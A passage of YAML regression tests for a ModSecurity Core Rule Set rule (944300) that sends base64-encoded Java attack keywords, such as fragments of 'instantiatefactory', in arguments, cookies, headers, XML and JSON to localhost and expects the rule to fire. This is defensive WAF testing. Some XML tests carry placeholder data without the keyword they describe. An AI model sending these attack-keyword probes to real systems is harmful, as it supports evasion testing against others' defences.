"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-122 - desc: "Argument name includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: 
"ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-123 - desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bmb3JjbG9zdXJl - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-124 - desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bmb3JjbG9zdXJl=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-125 - desc: "Request header test includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bmb3JjbG9zdXJl - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-126 - desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-127 - desc: "XML element value includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-128 - desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-129 - desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-130 - desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-131 - desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-132 - desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-133 - desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-134 - desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" 
- version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-135 - desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-136 - desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-137 - desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - 
log_contains: "id \"944300\"" - - - - test_title: 944300-138 - desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-139 - desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-140 - desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-141 - desc: "Content-Type application/json arg value 
includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-142 - desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-143 - desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-144 - desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-145 - desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-146 - desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-147 - desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-148 - desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-149 - desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-150 - desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: 
"ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-151 - desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-152 - desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-153 - desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-154 - desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-155 - desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-156 - desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-157 - desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-158 - desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-159 - desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-160 - desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-161 - desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-162 - desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-163 - desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-164 - desc: "Content-Type application/json arg name includes 